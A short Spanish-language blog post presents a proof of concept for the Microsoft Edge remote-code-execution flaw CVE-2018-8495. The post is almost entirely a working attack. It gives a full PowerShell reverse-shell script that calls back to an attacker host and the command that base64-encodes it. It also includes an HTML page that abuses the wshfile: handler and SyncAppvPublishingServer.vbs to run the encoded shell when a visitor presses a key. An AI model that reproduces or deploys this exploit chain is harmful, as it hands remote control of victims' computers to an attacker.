21 octubre, 2018 Alberto

Microsoft Edge RCE – CVE-2018-8495

Microsoft Edge logo

PoC para ejecutar una shell inversa en Powershell a partir de la PoC del autor (https://leucosite.com/Microsoft-Edge-RCE/) para la vulnerabilidad de RCE en Microsoft Edge.

Primero necesitamos crear un socket que haga una conexión inversa en Powershell:

$socket = new-object System.Net.Sockets.TcpClient('x.x.x.x', 8080);if($socket -eq $null){exit 1}$stream = $socket.GetStream();$writer = new-object System.IO.StreamWriter($stream);$buffer = new-object System.Byte[] 1024;$encoding = new-object System.Text.AsciiEncoding;do{$writer.Write("BertoShell> ");$writer.Flush();$read = $null;while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0,1024)) -eq $null){}$out = $encoding.GetString($buffer, 0,$read).Replace("`r`n","").Replace("`n","");if(!$out.equals("exit")){$out = $out.split(' ');$res = [string](&$out[0] $out[1..$out.length]);if($res -ne $null){ $writer.WriteLine($res)}}}While (!$out.equals("exit"))$writer.close();$socket.close();

La codificamos en base64:

user@kali1:~$ cat ~/shellcode.txt | iconv --to-code UTF-16LE |base64

Y sustituimos la llamada a la calculadora en la PoC del autor por la llamando a nuestra shell en Powershell:

<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc JABzAG8AYwBrAGUAdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQA5ADQALgA0ADUALgAxADYAOAAnACwAIAA4ADAAOAAwACkAOwBpAGYAKAAkAHMAbwBjAGsAZQB0ACAALQBlAHEAIAAkAG4AdQBsAGwAKQB7AGUAeABpAHQAIAAxAH0AJABzAHQAcgBlAGEAbQAgAD0AIAAkAHMAbwBjAGsAZQB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7ACQAYgB1AGYAZgBlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcAOwBkAG8AewAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAIgBCAGUAcgB0AG8AUwBoAGUAbABsAD4AIAAiACkAOwAkAHcAcgBpAHQAZQByAC4ARgBsAHUAcwBoACgAKQA7ACQAcgBlAGEAZAAgAD0AIAAkAG4AdQBsAGwAOwB3AGgAaQBsAGUAKAAkAHMAdAByAGUAYQBtAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQAgAC0AbwByACAAKAAkAHIAZQBhAGQAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAMQAwADIANAApACkAIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAfQAkAG8AdQB0ACAAPQAgACQAZQBuAGMAbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAJAByAGUAYQBkACkALgBSAGUAcABsAGEAYwBlACgAIgBgAHIAYABuACIALAAiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAGAAbgAiACwAIgAiACkAOwBpAGYAKAAhACQAbwB1AHQALgBlAHEAdQBhAGwAcwAoACIAZQB4AGkAdAAiACkAKQB7ACQAbwB1AHQAIAA9ACAAJABvAHUAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAOwAkAHIAZQBzACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACYAJABvAHUAdABbADAAXQAgACQAbwB1AHQAWwAxAC4ALgAkAG8AdQB0AC4AbABlAG4AZwB0AGgAXQApADsAaQBmACgAJAByAGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAgACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUATABpAG4AZQAoACQAcgBlAHMAKQB9AH0AfQBXAGgAaQBsAGUAIAAoACEAJABvAHUAdAAuAGUAcQB1AGEAbABzACgAIgBlAHgAaQB0ACIAKQApACQAdwByAGkAdABlAHIALgBjAGwAbwBzAGUAKAApADsAJABzAG8AYwBrAGUAdAAuAGMAbABvAHMAZQAoACkAOwA=;"'>test</a>
<script>
window.onkeydown=e=>{
window.onkeydown=z={};
q.click()
}
</script>
 
, , ,

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies